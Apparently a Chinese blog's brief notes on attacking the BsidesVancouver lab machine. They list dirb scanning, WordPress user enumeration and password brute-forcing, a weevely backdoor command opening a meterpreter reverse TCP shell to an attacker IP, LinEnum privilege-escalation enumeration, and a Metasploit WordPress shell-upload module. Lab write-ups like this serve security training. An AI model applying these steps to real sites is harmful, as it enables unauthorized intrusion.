靶机渗透实战总结
BsidesVancouver靶机渗透
笔记起来
- dirb 进行目录扫描尽量使用大字典 big.txt
- 对于wordpress 可以用wordscan进行用户名识别再进行密码爆破
- 对于wordpress 进入后台后可以利用
用weevely生成的马可以反向连接msf
1
:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 192.168.2.112
在靶机中执行LinEnum.git程序可以在低权限获取系统敏感信息
1
2git clone https://github.com/rebootuser/LinEnum.git
./LinEnum.sh进入wordpress后台后难以找到上传点时可以用msf的wp_admin_shell_upload模块直接弹shell
参考资料
笔记起来
爆破后台上马拿shell提权chkrootkit
Nineveh靶机渗透
参考资料
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 bb的博客!